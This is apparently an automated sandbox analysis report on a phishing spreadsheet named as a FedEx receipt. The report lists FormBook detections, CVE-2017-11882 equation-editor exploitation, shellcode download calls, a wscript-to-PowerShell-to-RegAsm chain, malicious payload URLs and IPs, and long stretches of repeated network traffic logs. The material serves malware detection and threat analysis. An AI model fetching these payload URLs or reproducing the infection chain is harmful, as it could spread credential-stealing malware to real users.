Source: Yara match	File source: 0000000C.00000002.572358514.0000000000250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
194.163.41.117	ilang.in	Germany	6659	NEXINTO-DE	true
23.95.235.16	unknown	United States	36352	AS-COLOCROSSINGUS	true
188.114.96.3	uploaddeimagens.com.br	European Union	13335	CLOUDFLARENETUS	false
41.216.183.13	unknown	South Africa	40676	AS40676US	true

Contacted Domains

Name	IP	Active
uploaddeimagens.com.br	188.114.96.3	true
ilang.in	194.163.41.117	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://23.95.235.16/88077/imagesofrosepetelflowerstogetitgreat.gif	true	Avira URL Cloud: safe	unknown
http://ilang.in/BrlcB	false	Avira URL Cloud: malware	unknown
http://23.95.235.16/88077/ima/ima.imim.im.imim.doC	true	Avira URL Cloud: safe	unknown
http://23.95.235.16/88077/BNNJ.txt	true	Avira URL Cloud: safe	unknown
https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235	false	Avira URL Cloud: safe	unknown

AV Detection

Antivirus detection for URL or domain

Source: http://ilang.in/BrlcByX	Avira URL Cloud: Label: malware
Source: http://ilang.in/BrlcB	Avira URL Cloud: Label: malware
Source: http://ilang.in/	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ima.imim.im.imim[1].doc	Avira: detection malicious, Label: HEUR/Rtf.Malformed
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DD4612E1.doc	Avira: detection malicious, Label: HEUR/Rtf.Malformed
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{3A50CEE2-6F27-47C4-9BA8-0FD0C2B7AD90}.tmp	Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen

Multi AV Scanner detection for submitted file

Source: FedEx Receipt_53065724643.xls	Virustotal: Detection: 29%			Perma Link
Source: FedEx Receipt_53065724643.xls	ReversingLabs: Detection: 28%

Yara detected FormBook

Source: Yara match	File source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.572393778.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.572358514.0000000000250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Machine Learning detection for sample

Source: FedEx Receipt_53065724643.xls

Joe Sandbox ML: detected

Exploits

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: 23.95.235.16 Port: 80

Jump to behavior

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Windows\SysWOW64\wscript.exe

Jump to behavior

Office Equation Editor has been started

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 194.163.41.117:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49176 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.163.41.117:443 -> 192.168.2.22:49179 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: RunPE.pdb source: powershell.exe, 0000000A.00000002.479671681.00000000062E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.479671681.0000000006221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.473348912.0000000000280000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Shellcode detected

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 7_2_036406FA LoadLibraryW,	7_2_036406FA
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 7_2_036407D9 ShellExecuteW,ExitProcess,	7_2_036407D9
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 7_2_036407AB URLDownloadToFileW,ShellExecuteW,ExitProcess,	7_2_036407AB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 7_2_036407FE ExitProcess,	7_2_036407FE
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 7_2_036407C4 ShellExecuteW,ExitProcess,	7_2_036407C4
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 7_2_03640615 ExitProcess,	7_2_03640615

Suspicious execution chain found

Source: C:\Windows\SysWOW64\wscript.exe	Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Potential document exploit detected (performs DNS queries)

Source: global traffic	DNS query: name: ilang.in
Source: global traffic	DNS query: name: ilang.in
Source: global traffic	DNS query: name: ilang.in
Source: global traffic	DNS query: name: ilang.in
Source: global traffic	DNS query: name: ilang.in
Source: global traffic	DNS query: name: ilang.in
Source: global traffic	DNS query: name: uploaddeimagens.com.br
Source: global traffic	DNS query: name: ilang.in
Source: global traffic	DNS query: name: ilang.in

Potential document exploit detected (performs HTTP gets)

Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 41.216.183.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 194.163.41.117:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 194.163.41.117:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 194.163.41.117:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 194.163.41.117:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 194.163.41.117:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 194.163.41.117:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 194.163.41.117:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 194.163.41.117:443

Potential document exploit detected (unknown TCP traffic)

Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
